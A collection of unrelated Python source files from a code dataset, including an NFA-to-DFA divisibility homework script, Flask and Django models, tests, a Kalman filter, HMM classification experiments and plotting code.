scalar = 1
possible_value = scalar * k
while True:
if possible_value % k == 0:
string_test = str(possible_value)
strings = []
for i, a in enumerate(string_test):
if int(string_test[0:i] + string_test[i+1:]) % mod_val == 0:
strings.append(string_test[0:i] + string_test[i+1:])
if len(strings) == len(string_test):
return string_test
else:
scalar += 1
possible_value = scalar * k
import copy
def currentStates(current_state):
if len(current_state.split('_')) > 1:
return [int(j) for j in current_state.split('_')]
else:
return [int(current_state)]
def nextStates(A, col, current_states):
current_col = set()
for state in current_states:
for next_state in A[state][col]:
current_col.add(next_state)
return current_col
def nextComboState(A, combo_state):
next_combo_states = []
for col, next_states in enumerate(A[0][0]):
current_states = currentStates(combo_state)
current_col = nextStates(A, col, current_states)
next_combo_states.append(('_'.join([str(j) for j in current_states]),
'_'.join([str(i) for i in sorted(copy.deepcopy(current_col))])))
return next_combo_states
def makeRow(B, combo_state, A, next_combo_states):
row = []
for i, next_state in enumerate(next_combo_states):
row.append(next_state[1])
return row
def addAcceptingStatesToF(current_combo_state, F, combo_state, accepting_states):
for number in [int(k) for k in combo_state.split('_')]:
if number in accepting_states:
F.add(current_combo_state)
return F
def appendNextComboStates(unadded_states, next_combo_states):
for j in next_combo_states:
unadded_states.append(j[1])
return unadded_states
def convertNFAToDFA(A, accepting_states):
unadded_states = ['0']
F = set()
B = od([])
while unadded_states != []:
combo_state = unadded_states[0]
del unadded_states[0]
next_combo_states = nextComboState(A, combo_state)
current_combo_state = next_combo_states[0][0]
F = addAcceptingStatesToF(current_combo_state, F, combo_state, accepting_states)
B[combo_state] = makeRow(B, combo_state, A, next_combo_states)
unadded_states = appendNextComboStates(unadded_states, next_combo_states)
x = set(unadded_states)
y = set(B.keys())
if list(x & y) != []:
unadded_states = list(x - y)
return B, F
def testing(F):
counter = 0
for i in F:
if '7' in i.split('_'):
counter += 1
return counter
def convertToProperllyConvertedDFA(dfa, f, dictionary):
new_dfa = []
for i, key in enumerate(dfa.keys()):
next_states = []
for next_state in dfa[key]:
next_states.append(dictionary[next_state] )
new_dfa.append(next_states)
new_F = [dictionary[key] for key in f]
#print(new_F)
return new_dfa, new_F
def Pop(queue):
item = queue[0]
del queue[0]
return item
def Push(queue, item):
queue.append(item)
return queue
# 9 is not strongly divisible by 7
def bfs(state_transition_table, start_state, alphabet, accepting_states, n):
edge_input = {i:letter for i, letter in enumerate(alphabet)}
visited = [0] * len(state_transition_table)
sequences_found_so_far = [(-1, -1)] * len(state_transition_table)
queue = []
visited[start_state] = 1
queue = Push(queue, start_state)
level_counter = 0
i = 1
j = 0
while (queue != []):
current_remainder = Pop(queue)
next_remainders = [(edge_input[i], NextRemainder) for i, NextRemainder in enumerate(state_transition_table[current_remainder])]
for y in next_remainders:
(letter, next_remainder) = y
if visited[next_remainder] == 0:
visited[next_remainder] = 1
sequences_found_so_far[next_remainder] = (current_remainder, letter)
queue = Push(queue, next_remainder)
j += 1
#0 is an accepting state
if next_remainder in accepting_states and level_counter == n:
sequences_found_so_far[next_remainder] = (current_remainder, letter)
return recover(sequences_found_so_far, next_remainder, n)
i -= 1
if i == 0:
level_counter += 1
i = j
j = 0
return 'none'
def recover(sequences_found_so_far, next_remainder, length):
sequence = []
(prev_state, input_index) = sequences_found_so_far[next_remainder]
sequence.insert(0, str(input_index))
length -= 1
while length > 0:
(prev_state, input_index) = sequences_found_so_far[prev_state]
sequence.insert(0, str(input_index))
length -= 1
return ''.join(sequence)
def createArray2(alphabet, n):
return [ [ ( remainder * 10 + letter ) % n for letter in alphabet ] for remainder in range(n) ]
def testConvertDFAEquivalence(nfa, accepting_states):
quitloop = False
for i in range(1):
b, f = convertNFAToDFA(nfa, accepting_states)
c, d = convertNFAToDFA(nfa, accepting_states)
for key_1, key_2 in zip(b.keys(), c.keys()):
#print(key_1, " ", key_2)
if key_1 != key_2:
print(key_1, " ", key_2, " SHOULD BE THE SAME")
quitloop = True
else:
for i, next_state in enumerate(b[key_1]):
if next_state != c[key_2][i]:
print("THIS IS WRONG, next state should equal c[key_2][i]")
if quitloop:
exit()
print("all keys were the same in the converted DFA's")
def testConvertToProperllyConvertedDFA(dfa1, dfa2):
quitloop = false
for i, row in enumerate(dfa1):
for j, col in enumerate(row):
if col != dfa2[i][j]:
print("our col in dfa1 did not equal dfa2, somethings wrong!")
quitloop = true
if quitloop:
exit()
print("Convert to properlly converted dfa worked!")
def convertTest(B, F):
converted_state_number = { number : i for i, number in enumerate(B.keys()) }
properlyConvertedDFA, properlyConvertedAcceptingStates = convertToProperllyConvertedDFA(B, F, converted_state_number)
new_accepting_states = set([i for i, row in enumerate(properlyConvertedDFA)]) - set(properlyConvertedAcceptingStates)
return properlyConvertedDFA
def testExtraCredit(nfa, accepting_states, n, k):
for i in range(10):
dfa_1, dfa_2 = makeDFAs([i for i in range(10)], k)
#nfa, accepting_states = makeNFA(dfa_1, dfa_2)
B, F = convertNFAToDFA(nfa, accepting_states)
converted_state_number = { number : i for i, number in enumerate(B.keys()) }
properlyConvertedDFA, properlyConvertedAcceptingStates = convertToProperllyConvertedDFA(B, F, converted_state_number)
new_accepting_states = set([i for i, row in enumerate(properlyConvertedDFA)]) - set(properlyConvertedAcceptingStates)
test_dfa = createArray2([i for i in range(1, 10)], k)
#int(len(str(n)))
#when 17 gets put in it fucks up
sequence = bfs(properlyConvertedDFA, 0, [i for i in range(10)], new_accepting_states, len(str(n)))
if sequence == -1:
print("Could not find any integer with ", int(len(str(n))), " digits that is strongly not divisible by ", k,)
else:
print("The smallest integer with ", int(len(str(n))), " digits that is strongly not divisible by ", k, " is: ", sequence)
#print(len(str(n)))
#for key in B.keys():
# print(B[key])
def main():
if sys.version_info <= (3, 0):
sys.exit('You need python 3.0>')
k = int(input("Enter your k (at most 4 digits): "))
if k > 9999:
while k > 9999:
k = int(input("Your k is more then 4 digits, try again: "))
dfa_1, dfa_2 = makeDFAs([i for i in range(10)], k)
nfa, accepting_states = makeNFA(dfa_1, dfa_2)
[print(i) for i in nfa]
n = input("Enter an integer N (up to 100 digits: ")
# 60602458739593758801428753207988572826358825383144 mod 7, 7777 passes
if stronglyNotDivisible(nfa, convertToList(n), accepting_states):
print("yes ", n, " is strongly not divisible by ", k)
else:
print("no ", n, " is strongly not divisible by ", k)
#fails after n is more then 16 digits long? wtf?
k = int(input('for extra credit reenter k but 0 <= k <= 100\n'))
n = int(input('for extra credit reenter n but 0 <= n <= 100 digits\n'))
while k > 100 or len(str(n)) > 100:
print('reenter k and n')
k = int(input('for extra credit reenter k but 0 <= k <= 100\n'))
n = int(input('for extra credit reenter n but 0 <= n <= 100 digits\n'))
dfa_3, dfa_4 = makeDFAs([i for i in range(10)], k)
nfa_2, accepting_states_2 = makeNFA(dfa_3, dfa_4)
testExtraCredit(nfa_2, accepting_states_2, n, k)
main()
| StarcoderdataPython |
11228504 | from flask_sqlalchemy_bundle import db
class OneBasic(db.Model):
class Meta:
lazy_mapped = True
name = db.Column(db.String)
class OneParent(db.Model):
class Meta:
lazy_mapped = True
# relationships = {'OneChild': 'children'}
name = db.Column(db.String)
children = db.relationship('OneChild', back_populates='parent')
class OneChild(db.Model):
class Meta:
lazy_mapped = True
# relationships = {'OneParent': 'parent'}
name = db.Column(db.String)
parent_id = db.foreign_key('OneParent')
parent = db.relationship('OneParent', back_populates='children')
class OneUserRole(db.Model):
"""Join table between User and Role"""
class Meta:
lazy_mapped = True
pk = None
# relationships = {'OneUser': 'user', 'OneRole': 'role'}
user_id = db.foreign_key('OneUser', primary_key=True)
user = db.relationship('OneUser', back_populates='user_roles')
role_id = db.foreign_key('OneRole', primary_key=True)
role = db.relationship('OneRole', back_populates='role_users')
__repr_props__ = ('user_id', 'role_id')
def __init__(self, user=None, role=None, **kwargs):
super().__init__(**kwargs)
if user:
self.user = user
if role:
self.role = role
class OneUser(db.Model):
class Meta:
lazy_mapped = True
# relationships = {'OneUserRole': 'user_roles'}
name = db.Column(db.String)
user_roles = db.relationship('OneUserRole', back_populates='user',
cascade='all, delete-orphan')
roles = db.association_proxy('user_roles', 'role',
creator=lambda role: OneUserRole(role=role))
class OneRole(db.Model):
class Meta:
lazy_mapped = True
# relationships = {'OneUserRole': 'role_users'}
name = db.Column(db.String, unique=True, index=True)
role_users = db.relationship('OneUserRole', back_populates='role',
cascade='all, delete-orphan')
users = db.association_proxy('role_users', 'user',
creator=lambda user: OneUserRole(user=user))
__repr_props__ = ('id', 'name')
| StarcoderdataPython |
9679998 | <filename>tests/test_snakefile.py
import subprocess
def test_snakefile_dryrun():
subprocess.run(['snakemake', '-n', '-r'], check=True)
assert True
def test_snakefile_full(setup_snakefile):
# Set the config MIC csv to use our test one
mic_csv = 'tests/public_mic_class_dataframe_test.csv'
# Use Snakemake to drive graph creation for two files
subprocess.run('snakemake --config graph_labels={}'.format(mic_csv),
check=True, shell=True)
assert True
def test_snakefile_full_pyinstrument(setup_snakefile):
# Set the config MIC csv to use our test one
mic_csv = 'tests/public_mic_class_dataframe_test.csv'
# Use Snakemake to drive graph creation for two files
subprocess.run(
'snakemake --config graph_labels={} --config pyinstrument=True'.format(
mic_csv),
check=True, shell=True)
assert True
| StarcoderdataPython |
9671178 | <filename>core/models.py
from django.db import models
from django.contrib.auth.models import AbstractBaseUser,BaseUserManager
class UsuarioManager(BaseUserManager):
use_in_migrations = True
def _create_user(self, ra, password, **extra_fields):
if not ra:
raise ValueError('RA precisa ser preenchido')
user = self.model(ra=ra, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, ra, password=None, **extra_fields):
return self._create_user(ra, password, **extra_fields)
def create_superuser(self, ra, password, **extra_fields):
return self._create_user(ra, password, **extra_fields)
class Usuario(AbstractBaseUser):
nome = models.CharField(max_length=50)
ra = models.IntegerField(unique=True)
password = models.CharField(max_length=150)
perfil = models.CharField(max_length=1,default ='C')
ativo = models.BooleanField(default=True)
USERNAME_FIELD = 'ra'
REQUIRED_FIELDS = ['nome']
objects = UsuarioManager()
@property
def is_staff(self):
return self.perfil == 'C'
def has_perm(self, perm, obj=None):
return True
def has_module_perms(self, app_label):
return True
def get_short_name(self):
return self.nome
def get_full_name(self):
return self.nome
def __unicode__(self):
return self.nome
class Curso(models.Model):
sigla = models.CharField(max_length=10)
nome = models.CharField(max_length=200)
tipo = models.CharField(max_length=50,blank=True)
carga_horaria = models.IntegerField(default=1000)
ativo = models.BooleanField(default=True)
descricao = models.TextField(blank=True)
Matriz_Curricular = models.TextField(blank=True)
def __unicode__(self):
return self.nome
class Aluno(Usuario):
curso = models.ForeignKey(
Curso
)
# Create your models here.
| StarcoderdataPython |
12837400 | <filename>UnityPy/Logger.py<gh_stars>0
import logging
import sys
from termcolor import colored
if sys.platform == 'win32':
from colorama import init
init()
COLORS = {
'DEBUG': 'green',
'INFO': 'yellow',
'WARNING': 'magenta',
'ERROR': 'red',
}
class ListHandler(logging.Handler):
def __init__(self):
super().__init__()
self.logs = []
def emit(self, record):
self.logs.append(record)
class ColoredFormatter(logging.Formatter):
def format(self, record):
msg = super().format(record)
levelname = record.levelname
if levelname in COLORS:
msg = colored(msg, COLORS[levelname])
return msg
| StarcoderdataPython |
3561577 | """
Generate a dataset with the following properties
- Binary classification
- Static features which are ~0.7 separable using RF
- Dynamic features which are ~0.7 separable using generative-model-based classifier
- Some of the instances must be predicatable only from the static features, other only from
the sequence data, other from both, and some are not reasonably predictable at all
"""
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from HMM.hmm_classifier import HMMClassifier
#
# Load the dataset
#
print 'Loading the dataset..'
static_train = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/train_static.npy')
dynamic_train = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/train_dynamic.npy')
static_val = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/test_static.npy')
dynamic_val = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/test_dynamic.npy')
labels_train = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/train_labels.npy')
labels_val = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/test_labels.npy')
#
# Sanity Checks
#
print "Expected performance of a lonely model is 0.75, of the joint model 1.0"
# a) static data classification
rf = RandomForestClassifier(n_estimators=100)
rf.fit(static_train, labels_train)
print "Random Forest with static features on validation set: %.4f" % rf.score(static_val, labels_val)
# b) dynamic data classification
hmmcl = HMMClassifier()
model_pos, model_neg = hmmcl.train(3, 10, dynamic_train, labels_train)
print "HMM with dynamic features on validation set: %.4f" % hmmcl.test(model_pos, model_neg, dynamic_val, labels_val)
"""
print "\nInital probabilities:"
print model_pos.startprob_
print model_neg.startprob_
print "\nTransition matrices:"
print model_pos.transmat_
print model_neg.transmat_
print "\nState means:"
print model_pos.means_
print model_neg.means_
print "\nState covariation matrices:"
print model_pos.covars_
print model_neg.covars_
"""
#
# Try to classify dynamic data with a discriminative model
#
dynamic_as_static_train = dynamic_train.reshape((dynamic_train.shape[0], dynamic_train.shape[1] * dynamic_train.shape[2]))
dynamic_as_static_val = dynamic_val.reshape((dynamic_val.shape[0], dynamic_val.shape[1] * dynamic_val.shape[2]))
print "Training RF on the dynamic dataset..."
rf = RandomForestClassifier(n_estimators=100)
rf.fit(dynamic_as_static_train, labels_train)
print "RF with dynamic features on validation set: %.4f" % rf.score(dynamic_as_static_val, labels_val)
#
# Evaluating Joint Model
#
print "Evaluating joint model:"
print "Splitting data in two halves..."
fh_idx = np.random.choice(range(0, dynamic_train.shape[0]), size=np.round(dynamic_train.shape[0] * 0.5, 0), replace=False)
sh_idx = list(set(range(0, dynamic_train.shape[0])) - set(fh_idx))
fh_data = dynamic_train[fh_idx, :, :]
fh_labels = labels_train[fh_idx]
sh_data = dynamic_train[sh_idx, :, :]
sh_labels = labels_train[sh_idx]
print "Training HMM classifier..."
hmmcl = HMMClassifier()
model_pos, model_neg = hmmcl.train(3, 10, fh_data, fh_labels)
print "Extracting ratios based on the HMM model..."
sh_ratios = hmmcl.pos_neg_ratios(model_pos, model_neg, sh_data)
val_ratios = hmmcl.pos_neg_ratios(model_pos, model_neg, dynamic_val)
print "Merging static features and HMM-based ratios..."
enriched_sh_data = np.hstack((static_train[sh_idx, :], sh_ratios.reshape(len(sh_ratios), 1)))
enriched_val_data = np.hstack((static_val, val_ratios.reshape(len(val_ratios), 1)))
print "Training RF on the merged dataset..."
rf = RandomForestClassifier(n_estimators=100)
rf.fit(enriched_sh_data, sh_labels)
print "RF+HMM with enriched features on validation set: %.4f" % rf.score(enriched_val_data, labels_val)
| StarcoderdataPython |
3220962 | from numpy import dot, sum, tile, exp, log, pi, shape, reshape
from numpy.linalg import inv, pinv, LinAlgError, det
import logging
logger = logging.getLogger("KalmanFilter")
# X: state vector at k-1
# P: covariance matrix at k-1
# A: state transition matrix
# Q: process noise covariance matrix
# B: input effect matrix
# U: control input vector
def kf_predict(x, P, A, Q, B, u):
shape_X_before = shape(x)
logger.debug("A: %s", A)
logger.debug("B: %s", B)
logger.debug("x: %s", x)
logger.debug("u: %s", u)
logger.debug("shape A: %s", A.shape)
logger.debug("shape B: %s", B.shape)
logger.debug("shape x: %s", x.shape)
logger.debug("shape u: %s", u.shape)
assert(shape(u)[0] == B.shape[1])
assert(A.shape[1] == B.shape[0])
Ax = dot(A, x)
Bu = dot(B, u)
Bu = reshape(Bu, (shape(Ax)))
logger.debug("dot(A, x): %s", Ax)
logger.debug("dot(B, u): %s", Bu)
x = Ax + Bu
logger.debug("x: %s", x)
P = dot(A, dot(P, A.T)) + Q
# make sure that we did not change the shape
# if we do, the matrix dimensions are probably wrong!
assert(shape(x) == shape_X_before)
return x, P
# X: state vector at k-1
# P: covariance matrix at k-1
# Y: measurement vector
# H: measurement prediction matrix
# R: measurement noise covariance matrix
def kf_update(X, P, Y, H, R):
# mean of predictive distribution of Y
IM = dot(H, X)
# Covariance or predictive mean of Y
IS = R + dot(H, dot(P, H.T))
# Kalman Gain
try:
K = dot(P, dot(H.T, pinv(IS)))
except LinAlgError:
logger.error("LinAlgError on IS inversion (Kalman Gain)")
logger.error(IS)
raise
#logger.debug("<NAME> G")
#logger.debug(K)
# update X, P
X = X + dot(K, (Y-IM))
P = P - dot(K, dot(IS, K.T))
#logger.debug(["P in update", P])
# predictive probability (likelihood) of measurement
#LH =gauss_pdf(Y, IM, IS)
return X, P, K, IM, IS #, LH
def gauss_pdf(X, M, S):
if M.shape()[1] == 1:
DX = X - tile(M, X.shape()[1])
E = 0.5 * sum(DX * (dot(inv(S), DX)), axis=0)
E = E + 0.5 * M.shape()[0] * log(2 * pi) +0.5 * log(det(S))
P = exp(-E)
elif X.shape()[1] == 1:
DX = tile(X, M.shape()[1])- M
E = 0.5 * sum(DX * (dot(inv(S), DX)), axis=0)
E = E + 0.5 * M.shape()[0] * log(2 * pi) +0.5 * log(det(S))
P = exp(-E)
else:
DX = X-M
E = 0.5 * dot(DX.T, dot(inv(S), DX))
E = E + 0.5 * M.shape()[0] * log(2 * pi) + .5 * log(det(S))
P = exp(-E)
return (P[0],E[0])
class KalmanFilter:
# X: state vector at k-1
# P: covariance matrix at k-1
# A: state transition matrix (function for dt)
# Q: process noise covariance matrix
# B: control influence (function for dt)
# H: measurement prediction matrix
def __init__(self, x, P, A, Q, B, H):
self.x = x
self.P = P
self.A = A
self.Q = Q
self.B = B
self.H = H
# U: control input vector
def predictWithInput(self, U, dt):
(self.x, self.P) = kf_predict(self.x, self.P, self.A(dt), dt * self.Q, self.B(dt), U)
return self.x, self.P
# Y: measurement vector
# R: measurement noise covariance matrix
def updateWithMeasurement(self, Y, R):
(self.x, self.P, K, IM, IS) = kf_update(self.x, self.P, Y, self.H, R)
return self.x, self.P
| StarcoderdataPython |
190600 | <reponame>Valentin-Aslanyan/ASOT
file_directory="./"
bfield_file="bfield.0057883"
import sys
sys.path[:0]=['/Change/This/Path']
from ASOT_Functions_Python import *
time,ntblks,nlblks,coord_logR,coord_theta,coord_phi,B=read_bfield_file(file_directory,bfield_file)
| StarcoderdataPython |
8110189 | <gh_stars>0
import threading
from receiver import Receiver
import socketserver
import datetime
import socket
from flask import Flask, render_template
from flask_socketio import SocketIO
async_mode = None
receiver_port = 9090
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app, async_mode=async_mode)
def receiver_task():
class EmitReceiver(Receiver):
def notify(self, message: dict):
message['address'] = self.request.getpeername()
message['time'] = datetime.datetime.now()
for k in message.keys():
message[k] = str(message[k])
print('EMIT', message)
socketio.emit('event', message, namespace='/log')
server = socketserver.ThreadingTCPServer(('', receiver_port), EmitReceiver)
server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.serve_forever()
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
# receiver_task()
th = threading.Thread(target=receiver_task)
th.start()
socketio.run(app, debug=False, host='0.0.0.0', port=5050)
| StarcoderdataPython |
6503974 | # encoding: utf-8
"""Provides Python 2 compatibility objects."""
from StringIO import StringIO as BytesIO # noqa
def is_integer(obj):
"""Return True if *obj* is an integer (int, long), False otherwise."""
return isinstance(obj, (int, long))
def is_string(obj):
"""Return True if *obj* is a string, False otherwise."""
return isinstance(obj, basestring)
def is_unicode(obj):
"""Return True if *obj* is a unicode string, False otherwise."""
return isinstance(obj, unicode)
def to_unicode(text):
"""Return *text* as a unicode string.
*text* can be a 7-bit ASCII string, a UTF-8 encoded 8-bit string, or unicode. String
values are converted to unicode assuming UTF-8 encoding. Unicode values are returned
unchanged.
"""
# both str and unicode inherit from basestring
if not isinstance(text, basestring):
tmpl = "expected unicode or UTF-8 (or ASCII) encoded str, got %s value %s"
raise TypeError(tmpl % (type(text), text))
# return unicode strings unchanged
if isinstance(text, unicode):
return text
# otherwise assume UTF-8 encoding, which also works for ASCII
return unicode(text, "utf-8")
Unicode = unicode
| StarcoderdataPython |
3591085 | import psycopg2
class Postgres(object):
def __init__(self, server, port, database, username, password):
dbconn = {'database': database,
'user': username,
'password': password,
'host': server,
'port': port}
self.pg_conn = psycopg2.connect(**dbconn)
self.pg_cur = self.pg_conn.cursor()
| StarcoderdataPython |
272073 | from lona.html import Strong, Button, CLICK, HTML, Div, H1
from lona import LonaView, LonaApp
from lona_chartjs import Chart
app = LonaApp(__file__)
app.add_static_file('lona/style.css', """
body{
font-family: sans-serif;
}
""")
@app.route('/')
class ChartjsClickAnalyzerView(LonaView):
def handle_request(self, request):
html = HTML(
H1('Chart.js Click Analyzer'),
Div(
_id='click',
nodes=[
Div('Click the click area'),
Div(Strong(_id='click-counter'), ' clicks to go'),
Div(
_id='click-area',
_style={
'width': '500px',
'height': '300px',
'background-color': 'lightgrey',
},
events=[CLICK],
),
],
),
Div(_id='chart'),
)
click_div = html.query_selector('#click')
click_counter = html.query_selector('#click-counter')
click_area = html.query_selector('#click-area')
chart_div = html.query_selector('#chart')
while True:
# show click area
click_div.show()
chart_div.hide()
# record clicks
x_positions = []
y_positions = []
for i in range(10, 0, -1):
click_counter.set_text(str(i))
self.show(html)
input_event = self.await_click(click_area)
x_positions.append(input_event.data['x'])
y_positions.append(input_event.data['y'])
# render chart
chart = Chart({
'type': 'line',
'data': {
'labels': [str(i) for i in range(1, 11)],
'datasets': [
{
'label': 'X Position',
'data': x_positions,
'backgroundColor': 'red',
'borderColor': 'red',
},
{
'label': 'Y Position',
'data': y_positions,
'backgroundColor': 'blue',
'borderColor': 'blue',
},
],
},
'options': {
'responsive': False,
'scales': {
'y': {
'beginAtZero': True,
},
},
},
})
chart.width = '500px'
chart.height = '300px'
chart_div.nodes.clear()
chart_div.nodes.append(Button('Reset'))
chart_div.nodes.append(chart)
# show chart
click_div.hide()
chart_div.show()
self.show(html)
self.await_click()
app.run()
| StarcoderdataPython |
9649031 | # waht we need: policy and state transition matrix
# combine those two into one ditcionary and read it out into a textfile
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import time
from collections import Counter
from PlotCircles import circles
import multiprocessing
import itertools
import os
import random
from operator import itemgetter
from math import *
# set the current working directory
def chunks(l, n):
if n == 0:
yield l
else:
# For item i in a range that is a length of l,
for i in range(0, len(l), n):
# Create an index range for l of n items:
if isinstance(l, list):
yield l[i:i+n]
else:
yield l.loc[i:i+n-1].reset_index(drop = True)
def convertValues(valueArr, old_max ,old_min,new_max, new_min):
minArr =old_min
maxArr = old_max
rangeArr = maxArr-minArr
newRangeArr = new_max-new_min
result = [((val - minArr)/float(rangeArr))*newRangeArr+new_min for val in valueArr]
return result
def area_calc(probs, r):
result = [np.sqrt(float(p))*r for p in probs]
return result
def duplicates(n):
counter=Counter(n) #{'1': 3, '3': 3, '2': 3}
dups=[i for i in counter if counter[i]!=1] #['1','3','2']
result={}
for item in dups:
result[item]=[i for i,j in enumerate(n) if j==item]
return result
# hepler function for plotting the lines
def isReachable(currentIdent, nextIdentList):
condition_a = currentIdent*2
condition_b = condition_a+1
yVals = [idx for idx,item in enumerate(nextIdentList) if (condition_a in item or condition_b in item)]
yVals = list(set(yVals))
return yVals
def joinIndidividualResultFiles(argument, tValues, dataPath):
# need to provide the dataPath accordingly
if argument == 'raw':
resultsDFAll =[]
for t in tValues:
print 'Currently aggregating data for time step %s' % t
# batch level
resultDFList = [batchPstar for batchPstar in os.listdir(os.path.join(dataPath, '%s' % t))]
resultDFListSorted = [batchPstar for batchPstar in
sorted(resultDFList, key=lambda x: int(x.replace('.csv', '')))]
# read and concatenate all csv file for one time step
resultsDF = pd.concat(
[pd.read_csv(os.path.join(dataPath, os.path.join('%s' % t, f)),index_col=0).reset_index(drop = True) for f in resultDFListSorted]).reset_index(drop = True)
resultsDFAll.append(resultsDF)
finalData = pd.concat(resultsDFAll).reset_index(drop = True)
finalData.to_csv('finalRaw.csv')
elif argument == "aggregated":
resultsDF = pd.concat(
[pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' % t), index_col=0) for t in
tValues]).reset_index(drop=True)
resultsDF.to_csv('finalAggregated.csv')
elif argument == 'plotting':
resultsDF = pd.concat(
[pd.read_csv(os.path.join(dataPath, 'plottingResults_%s.csv' % t), index_col=0) for t in
tValues]).reset_index(drop=True)
resultsDF.to_csv('finalPlotting.csv')
else:
print "Wrong argument"
# function for parallelization
def plotLinesCopy(subDF1Identifiers, nextIdentList):
yvalsIDXAll = []
if subDF1Identifiers:
for identSubDF1 in subDF1Identifiers: # as many lines as unique cue validities
subList = [isReachable(ident, nextIdentList) for ident in identSubDF1]
subList.sort()
subList2 = list(subList for subList, _ in itertools.groupby(subList))
yvalsIDXAll.append(subList2)
del subList
del subList2
return yvalsIDXAll
def plotLines(identSubDF1, nextIdentList):
subList = [isReachable(ident, nextIdentList) for ident in identSubDF1]
subList.sort()
subList2 = list(subList for subList, _ in itertools.groupby(subList))
del subList
return subList2
def func_star(allArgs):
return plotLines(*allArgs)
def cleanIdentifiers(oldIdentifiers):
newIdent = [str(ident).replace('[', '').replace(']', '').split(',') for ident in oldIdentifiers]
newIdent2 = [[int(str(a).replace('.0', '')) for a in subList] for subList in newIdent]
return newIdent2
def policyPlotReduced(T,r,pE0Arr, pC0E0Arr, tValues, dataPath, lines, argumentR, argumentP, minProb,mainPath, plottingPath):
# preparing the subplot
fig, axes = plt.subplots(len(pC0E0Arr), len(pE0Arr), sharex= True, sharey= True)
fig.set_size_inches(16, 16)
fig.set_facecolor("white")
ax_list = fig.axes
# looping over the paramter space
iX = 0
for cueVal in pC0E0Arr: # for each cue validity
jX = 0
for pE0 in pE0Arr: # for each prior
# set the working directory for the current parameter combination
os.chdir(os.path.join(mainPath,"runTest_%s%s_%s_%s" % (argumentR[0], argumentP[0], pE0, cueVal)))
ax = ax_list[iX*len(pE0Arr)+jX]
# preparing data for the pies
coordinates = []
decisionsPies = []
stateProbPies = []
for t in tValues:
# here is where the relevant files are loaded
aggregatedResultsDF = pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' %t))
# convert range to have a square canvas for plotting (required for the circle and a sensible aspect ratio of 1)
aggregatedResultsDF['newpE1'] = convertValues(aggregatedResultsDF['pE1'], 1, 0, T - 1, 1)
aggregatedResultsDF = aggregatedResultsDF[aggregatedResultsDF.stateProb >minProb] # minProb chance of reaching that state
if t >= 1:
subDF = aggregatedResultsDF[aggregatedResultsDF['time'] ==t]
subDF = subDF.reset_index(drop=True)
pE1list = subDF['newpE1']
duplicateList = duplicates(pE1list)
if duplicateList:
stateProbs = list(subDF['stateProb'])
decisionMarker = list(subDF['marker'])
for key in duplicateList:
idxDuplList = duplicateList[key]
coordinates.append((t,key))
stateProbPies.append([stateProbs[i] for i in idxDuplList])
decisionsPies.append([decisionMarker[i] for i in idxDuplList])
color_palette = {0:'#be0119', 1:'#448ee4', 2:'#000000', 3: '#98568d', 4: '#548d44', -1: '#d8dcd6'}
colors = np.array([color_palette[idx] for idx in aggregatedResultsDF['marker']])
area = area_calc(aggregatedResultsDF['stateProb'], r)
# now plot the developmental trajectories
circles(aggregatedResultsDF['time'],aggregatedResultsDF['newpE1'], s =area, ax = ax,c = colors, zorder = 2, lw = 0.5)
del aggregatedResultsDF
# plotting the lines
if lines:
startTime = time.clock()
for t in np.arange(0,T-1,1):
print "Current time step: %s" % t
tNext = t+1
timeArr = [t, tNext]
if t == 0:
plottingDF = pd.read_csv(os.path.join(dataPath, 'plottingResults_%s.csv' % (t+1)))
plottingDF['newpE1'] = convertValues(plottingDF['pE1'], 1, 0, T - 1, 1)
subDF1 = plottingDF[plottingDF['time'] == t]
subDF1 = subDF1.reset_index(drop=True)
subDF2 = plottingDF[plottingDF['time'] == tNext]
subDF2 = subDF2.reset_index(drop=True)
aggregatedResultsDF = pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' % (tNext)))
aggregatedResultsDF = aggregatedResultsDF[aggregatedResultsDF.time ==1]
aggregatedResultsDF = aggregatedResultsDF.reset_index(drop = True)
indices = aggregatedResultsDF.index[aggregatedResultsDF.stateProb > minProb].tolist()
subDF2 = subDF2.iloc[indices]
subDF2 = subDF2.reset_index(drop=True)
del aggregatedResultsDF
else:
subDF1 = subDF2
del subDF2
aggregatedResultsDF = pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' % (tNext)))
aggregatedResultsDF.drop_duplicates(subset='pE1', inplace=True)
aggregatedResultsDF.reset_index(drop=True, inplace=True)
indices = aggregatedResultsDF.index[aggregatedResultsDF.stateProb <= minProb].tolist()
del aggregatedResultsDF
subDF2 = pd.read_csv(os.path.join(dataPath, 'plottingResults_%s.csv' %tNext))
subDF2['newpE1'] = convertValues(subDF2['pE1'], 1, 0, T - 1, 1)
subDF2.reset_index(drop=True, inplace= True)
subDF2.drop(index = indices, inplace= True)
subDF2.reset_index(drop=True, inplace=True)
del indices
subDF1['Identifier'] = cleanIdentifiers(subDF1.Identifier)
subDF2['Identifier'] = cleanIdentifiers(subDF2.Identifier)
nextIdentList = subDF2['Identifier']
yvalsIDXAll = []
if t <= 11: # otherwise the overhead for multiprocessing is slowing down the computation
for identSubDF1 in list(subDF1.Identifier):
subList = [isReachable(ident, nextIdentList) for ident in identSubDF1]
subList.sort()
subList2 = list(subList for subList, _ in itertools.groupby(subList))
yvalsIDXAll.append(subList2)
del subList
del subList2
else:
for identSubDF1 in list(subDF1.Identifier): # as many lines as unique cue validities
pool = multiprocessing.Pool(processes=32)
results = pool.map(func_star, itertools.izip(chunks(identSubDF1, 1000), itertools.repeat(nextIdentList)))
pool.close()
pool.join()
resultsUnchained = [item for sublist in results for item in sublist]
yvalsIDXAll.append(resultsUnchained)
del results
del resultsUnchained
# process the results
yArr = []
for subIDX in range(len(subDF1)):
yArr = [[subDF1['newpE1'].loc[subIDX], subDF2['newpE1'].loc[yIDX]] for yIDX in
